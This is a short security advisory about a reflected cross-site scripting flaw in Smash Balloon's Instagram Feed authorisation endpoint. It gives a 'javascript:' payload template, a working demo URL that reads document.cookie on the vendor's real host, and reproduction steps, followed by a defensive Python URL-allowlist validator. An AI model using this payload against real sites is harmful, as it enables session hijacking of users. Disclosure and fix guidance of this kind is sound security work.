Smash Balloon Instagram Feed - Cross-Site Scripting Vulnerabilities

2021.11.10
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#############################################################
# Title: Smash Balloon Instagram Feed - Cross-Site Scripting Vulnerabilities
# Inventor: Gh05t666nero (IndoGhostSec)
# Vendor: Smash Balloon Team
# Version: 2.9.5
# Product: https://smashballoon.com/instagram-feed/
# Machine: Linux gh05t666nero 5.10.0-kali9-686-pae #1 SMP Debian 5.10.46-4kali1 (2021-08-09) i686 GNU/Linux
# Date: 2021-04-09
#############################################################

[*] About:
════════

One of the vendor's social media interface APIs, connect.smashballoon.com, suffers from a reflected XSS vulnerability that allows an attacker to steal victim sessions. The `state` parameter of the Instagram redirect endpoint is reflected unvalidated into an `href`, so a `javascript:` URL supplied there executes when the link is clicked.

#############################################################

[*] Exploit:
═════════

javascript:[Malicious-JS]

#############################################################

[*] Demo:
════════

https://connect.smashballoon.com/auth/ig/instagram-basic-display-redirect.php?state=javascript:alert(document.cookie);

#############################################################

[*] Reproduce:
════════════

1. Visit the link above.
2. Click the link that says "click here".
3. The JavaScript in the `state` value executes, demonstrating the XSS.

#############################################################

[*] Contact:
══════════

# Instagram: @ojansec
# E-mail: admin@deepweb.id
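The missing control here is validation of the `state` value before it is written into an `href`. The following is an added defender-side illustration, not the advisory's or the vendor's code: an allowlist validator that accepts only absolute http(s) URLs on hosts the callback is allowed to send users to (the host list and the `render_click_here` helper are assumptions for the example), and falls back to a fixed safe URL otherwise.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Constructed for this example: only these schemes/hosts may appear in the link.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"example.com", "www.example.com"}  # assumption, not the vendor's list


def safe_redirect_target(value: str) -> Optional[str]:
    """Return ``value`` if it is an absolute http(s) URL on an allowed host, else None.

    Rejecting by allowlist (rather than blocklisting "javascript:") also covers
    scheme-relative URLs (//evil.test), data: and vbscript: URLs, and case tricks.
    """
    if not isinstance(value, str) or not value or len(value) > 2048:
        return None
    # Browsers strip leading/trailing whitespace and embedded tab/CR/LF before
    # parsing the scheme, so "\tjavascript:" still runs; reject such input outright.
    if value != value.strip() or any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return None
    try:
        parts = urlsplit(value)  # lowercases the scheme for us
    except ValueError:  # e.g. malformed IPv6 literal
        return None
    if parts.scheme not in ALLOWED_SCHEMES:
        return None
    if parts.hostname is None or parts.hostname not in ALLOWED_HOSTS:
        return None
    if parts.username or parts.password:  # https://example.com@evil.test/ style userinfo
        return None
    return value


def render_click_here(state: str) -> str:
    """Build the 'click here' anchor: validated target, then attribute-encoded."""
    target = safe_redirect_target(state) or "https://example.com/"  # assumed safe default
    return '<a href="%s">click here</a>' % html.escape(target, quote=True)
```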



Copyright 2021, cxsecurity.com
